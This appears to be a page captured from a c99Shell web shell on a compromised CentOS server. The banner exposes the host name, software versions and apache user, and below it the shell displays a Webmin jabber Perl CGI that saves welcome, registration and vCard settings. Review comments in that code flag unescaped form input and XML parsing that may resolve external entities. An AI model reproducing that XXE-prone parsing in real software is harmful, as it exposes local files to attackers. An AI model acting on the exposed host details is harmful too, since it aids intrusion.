!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/usr/libexec/webmin/jabber/   drwxr-xr-x
Free 53.79 GB of 127.8 GB (42.09%)


Viewing file:     save_messages.cgi (1.29 KB)      -rwxr-xr-x
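#!/usr/bin/perl
# save_messages.cgi
# Save welcome and other messages
#
# Takes the submitted form fields from %in, updates the welcome, register and
# vcard settings under the jsm element of the "sessions" service, then writes
# the jabber configuration back and redirects.
# The &-called helpers, %in, %text and @register_fields are not defined in
# this file; presumably they come from jabber-lib.pl -- confirm.

require './jabber-lib.pl';
&ReadParse();
&error_setup($text{'messages_err'});

# Locate the configuration nodes that this form edits
$conf = &get_jabber_config();
$session = &find_by_tag("service", "id", "sessions", $conf);
$jsm = &find("jsm", $session);
$welcome = &find("welcome", $jsm);
$register = &find("register", $jsm);
$vcard = &find("vcard", $jsm);

# Validate and store inputs
# NOTE(review): wsubject, wbody and rinstr are passed on exactly as submitted.
# No validation or escaping is visible in this file, so it has to happen in
# save_directive/save_jabber_config -- confirm before relying on it.
&save_directive($welcome, "subject",
        [ [ "subject", [ { }, 0, $in{'wsubject'} ] ] ] );
&save_directive($welcome, "body",
        [ [ "body", [ { }, 0, $in{'wbody'} ] ] ] );

# Parse the submitted vCard XML into a tree; a malformed document makes
# parse() die, which the eval traps.
# NOTE(review): this parses request-supplied XML. Unless told otherwise,
# XML::Parser installs a default handler that resolves external entities, so
# a submitted document could make the parser read local files or fetch URLs
# with this CGI's privileges. Consider passing an ExternEnt handler that
# refuses them, and confirm who is allowed to reach this form.
eval {
    $xml = XML::Parser->new('Style' => 'Tree');
    $in{'vcard'} =~ s/\r//g;
    $vcxml = $xml->parse($in{'vcard'});
    };
# Keep the parse error now: $@ is a global, and any eval run inside the
# helper calls below would reset it before it is checked.
my $vcard_err = $@;

# The notify attribute is set directly on the register element's attribute hash
$register->[1]->[0]->{'notify'} = $in{'rnotify'} ? 'yes' : 'no';
&save_directive($register, "instructions",
        [ [ "instructions", [ { }, 0, $in{'rinstr'} ] ] ] );
foreach $f (@register_fields) {
    if ($in{"rfield_$f"}) {
        # Field ticked in the form: store it as an empty element
        &save_directive($register, $f, [ [ $f, [ { } ] ] ] );
        }
    else {
        # Field not ticked: no replacement given (presumably removes it)
        &save_directive($register, $f);
        }
    }

# Reject a vCard that failed to parse or whose root element is not <vcard>.
# These checks run before save_jabber_config, so nothing is written on
# failure, assuming error() ends the request -- confirm.
&error(&text('messages_evcard', $vcard_err)) if ($vcard_err);
&error($text{'messages_etag'}) if (lc($vcxml->[0]) ne 'vcard');
&save_directive($jsm, [ $vcard ], [ $vcxml ]);
&save_directive($jsm, "vcard2jud",
        $in{'vcard2jud'} ? [ [ 'vcard2jud', [ { } ] ] ] : [ ] );

# Write the modified configuration back, then return to the module index
&save_jabber_config($conf);
&redirect("");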

